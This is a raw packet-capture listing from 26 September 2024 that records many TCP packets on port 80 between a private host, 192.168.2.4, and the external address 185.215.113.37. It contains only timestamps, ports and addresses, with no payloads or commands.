Sep 26, 2024 00:39:12.166493893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166495085 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.166505098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166517973 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166526079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.166529894 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166541100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166553020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166555882 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.166563988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166574955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.166574955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166589022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.166598082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.166642904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.166671991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240629911 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240700960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240717888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240737915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240756989 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240761042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240772009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240782976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240786076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240802050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240814924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240814924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240827084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.240839958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240869045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.240994930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241005898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241018057 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241036892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.241066933 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.241070986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241166115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.241352081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241363049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241389036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241396904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.241398096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241411924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.241422892 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.241451979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242073059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242131948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242132902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242146015 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242166996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242177963 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242185116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242199898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242228031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242249966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242260933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242271900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242290974 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242304087 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242310047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242321968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242326975 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242346048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242360115 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242363930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242381096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242393970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242404938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242419004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242446899 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242474079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242485046 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242496014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242518902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242539883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242685080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242697001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242713928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242723942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242733955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242763042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242789984 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242835045 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242845058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242871046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242885113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242885113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242898941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242911100 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242922068 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242949009 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242949963 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242961884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.242968082 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.242995977 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.243027925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243040085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243051052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243061066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243071079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243077993 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.243083000 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243093967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243098021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.243125916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.243133068 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.243143082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243153095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243161917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.243190050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.243208885 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375013113 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375030994 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375042915 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375055075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375072956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375078917 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375092983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375103951 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375108957 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375116110 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375129938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375139952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375150919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375159025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375168085 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375174046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375176907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375179052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375193119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375221968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375237942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375248909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375260115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375271082 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375288010 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375305891 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375359058 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375380993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375406981 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375417948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375421047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375431061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375442028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375449896 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375452042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375466108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375473022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375473022 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375477076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375494957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375504971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375509024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375516891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375520945 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375529051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375538111 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375540018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375550985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375571012 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375575066 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375587940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375598907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375598907 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375626087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375649929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375823021 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375834942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375844955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375854969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375865936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375876904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375886917 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375897884 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375897884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375897884 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375910044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375916958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375926971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375936985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375945091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375947952 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.375952005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375960112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375966072 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375973940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375979900 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.375981092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376013041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376029968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376214027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376224995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376235008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376245975 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376256943 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376261950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376270056 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376281023 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376282930 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376291990 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376302958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376312017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376312971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376326084 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376332045 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376343012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376353979 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376359940 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376370907 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376378059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376388073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376406908 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376574993 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376584053 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376590967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376595020 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376602888 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376611948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376619101 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376619101 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376626968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376635075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376637936 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376640081 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376641989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376643896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376648903 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376652002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376661062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376668930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376677036 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376682997 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376686096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376688004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376698017 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376705885 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376708031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376713991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376717091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376723051 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376727104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376734018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376741886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376744032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.376753092 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.376785994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.465440035 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.465699911 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489142895 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489170074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489182949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489195108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489206076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489217043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489229918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489236116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489248037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489248991 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489259958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489269018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489272118 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489284039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489285946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489296913 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.489299059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489866972 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.489867926 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490248919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490299940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490317106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490322113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490330935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490345001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490361929 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490376949 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490390062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490390062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490394115 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490427971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490438938 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490453005 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490463018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490473986 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490483999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.490497112 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.490518093 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491323948 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491374969 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491410971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491421938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491430998 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491442919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491455078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491458893 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491471052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491477966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491483927 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491493940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491506100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491516113 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491524935 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491533041 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491535902 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491548061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491566896 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491573095 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491578102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491586924 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491602898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491605043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491616964 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491621017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491630077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491636992 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491652966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491672039 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491687059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491703033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491714954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491724968 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491727114 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491740942 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491761923 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491800070 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491811991 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491822004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491832972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491847038 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491856098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491858006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 00:39:12.491866112 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 00:39:12.491874933 CEST	49730	80	192.168.2.4	185.215.113.37
